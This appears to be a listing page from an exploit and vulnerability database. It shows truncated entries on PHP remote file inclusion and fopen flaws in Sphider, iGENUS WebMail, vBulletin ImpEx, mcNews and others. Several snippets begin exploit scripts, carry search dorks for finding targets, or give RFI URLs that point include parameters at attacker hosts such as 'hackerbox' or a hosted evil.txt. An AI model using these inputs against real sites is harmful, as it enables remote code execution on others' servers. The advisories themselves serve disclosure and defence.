Nucleus CMS 3.22 - 'DIR_LIBS' Remote File Inclusion

!/usr/bin/php -q -d shortopentag=on \r\n"; die...

sphider_13_xpl_pl.txt

!/usr/bin/perl use IO::Socket; print "\r\nSphider works with registerglobals = On & allowurlfopen = On\r\n"; print "by rgod rgodautisticiorg\r\n"; print "site: http://retrogod.altervista.org\r\n"; print "\r\ndork: "powered by sphider"\r\n"; sub main::urlEncode my $string = @; $string = s/\W/"%"...

vBulletin ImpEx <= 1.74 Remote Command Execution Exploit

No description provided by source. ?php / vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN Sh0uts: xorcrew.net, ajax, gml, subterrain, My gf url: http://www.xorcrew.net/ReZEN example: turl: http://www.target.com/impex/ImpExData.php?systempath= hurl:http://www.pwn3d.com/evil.txt? / $cm...

Sphider 1.3 - configset.php Remote File Inclusion

Sphider 1.3 - configset.php Remote File Inclusion !/usr/bin/perl use IO::Socket; print "\r\nSphider works with registerglobals = On & allowurlfopen = On\r\n"; print "by rgod rgodautisticiorg\r\n"; print "site: http://retrogod.altervista.org\r\n"; print "\r\ndork: "powered by sphider"\r\n"; sub...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in index.php in ViHor Design allow remote attackers to inject arbitrary web script or HTML via 1 a remote URL in the page parameter, which is processed by an fopen call, or 2 HTML or script in the page parameter, which is returned to the client in...

CVE-2006-1496

Multiple cross-site scripting XSS vulnerabilities in index.php in ViHor Design allow remote attackers to inject arbitrary web script or HTML via 1 a remote URL in the page parameter, which is processed by an fopen call, or 2 HTML or script in the page parameter, which is returned to the client in...

igenus_remote.txt

!/usr/bin/perl use IO::Socket; print "\r\n"; print "iGENUS WebMail works against PHP5 with registerglobals = On\r\n"; print " & allowurlfopen = On\r\n"; print "by rgod rgodautisticiorg\r\n"; print "site: http://retrogod.altervista.org\r\n\r\n"; print "dork: intitle:"igenus webmail login"\r\n";...

iGENUS WebMail <= 2.0.2 (config_inc.php) Remote Code Execution Exploit

No description provided by source. !/usr/bin/perl use IO::Socket; print "\r\n"; print "iGENUS WebMail = 2.0.2 remote commads xctn\r\n"; print "- works against PHP5 with registerglobals = On\r\n"; print " & allowurlfopen = On\r\n"; print "by rgod rgodATautisticiDOTorg\r\n"; print "site:...

[SA16971] PHP Trailing Slash "open_basedir" Security Bypass

TITLE: PHP Trailing Slash "openbasedir" Security Bypass SECUNIA ADVISORY ID: SA16971 VERIFY ADVISORY: http://secunia.com/advisories/16971/ CRITICAL: Not critical IMPACT: Security Bypass WHERE: Local system SOFTWARE: PHP 4.4.x http://secunia.com/product/5768/ PHP 5.0.x...

CVE-2005-3054

PHP fopen_wrappers.c vulnerability (CVE-2005-3054) affects PHP 4.4.0 and possibly other versions, where open_basedir with a trailing slash can fail to restrict access to directories whose names are substrings of the target path. This enables PHP scripts in one directory to access files in other d...

ModernBill <= 4.3.0 Multiple Vulnerabilities

The version of ModernBill installed on the remote host is subject to multiple vulnerabilities : - A Remote File Include Vulnerability The application fails to sanitize the parameter 'DIR' before using it in the script 'news.php'. An attacker can exploit this flaw to browse or execute arbitrary...

phpWebLog 0.5.3 - Arbitrary File Inclusion

phpWebLog 0.5.3 - Arbitrary File Inclusion Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/include/init.inc.php?GPATH=http://hackerbox/ http://victim/dir/backend/addons/links/index.php?PATH=http://hackerbox/ milw0rm.com 2005-03-07...

PHP mcNews 1.3 - skinfile Remote File Inclusion

PHP mcNews 1.3 - skinfile Remote File Inclusion Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/mcNews/admin/header.php?skinfile=http://hackerbox/ milw0rm.com 2005-03-07...

PHP mcNews 1.3 - &#039;skinfile&#039; Remote File Inclusion

Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/mcNews/admin/header.php?skinfile=http://hackerbox/ milw0rm.com 2005-03-07...

PHP Form Mail 2.3 - Arbitrary File Inclusion

PHP Form Mail 2.3 - Arbitrary File Inclusion Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/inc/formmail.inc.php?scriptroot=http://hackerbox/ milw0rm.com 2005-03-05...

CVE-2002-1466

CafeLog b2 Weblog Tool 2.06pre4, with allowfopenurl enabled, allows remote attackers to execute arbitrary PHP code via the b2inc variable...

phpcrlf.txt

PHP fopen CRLF Injection PROGRAM: PHP VENDOR: The PHP Group HOMEPAGE: http://www.php.net/ VULNERABLE VERSIONS: 4.1.2, 4.2.2, 4.2.3, latest CVS, possibly others IMMUNE VERSIONS: none, but workarounds exist SEVERITY: medium DESCRIPTION: "PHP is a widely-used Open Source general-purpose scripting...

SGI IRIX 6.5.x - FAM Arbitrary Root Owned Directory File Listing

SGI IRIX 6.5.x - FAM Arbitrary Root Owned Directory File Listing source: https://www.securityfocus.com/bid/5487/info fam is a freely available, open source file alteration monitor. It is maintained and distributed by SGI, and will work on the Linux and Unix operating systems. It is possible for a...

code injection in gallery

Hi! Code injection in gallery ------------------------------------- What is gallery? The Gallery is actually the best web gallery application around in the world. I'm using it too ;-. Go to http://gallery.sf.net/ to get further information and download this very cool app. remote include problems...

vixie-cron.sh

Attached shell-script exploits fopen + preserved umask vulnerability in Paul Vixie's cron code. It will work on systems where /var/spool/cron is user-readable eg. 0755 - AFAIR Debian does so. RedHat at least 6.1 and previous have mode 0700 on /var/spool/cron, and thus it isn't exploitable in its...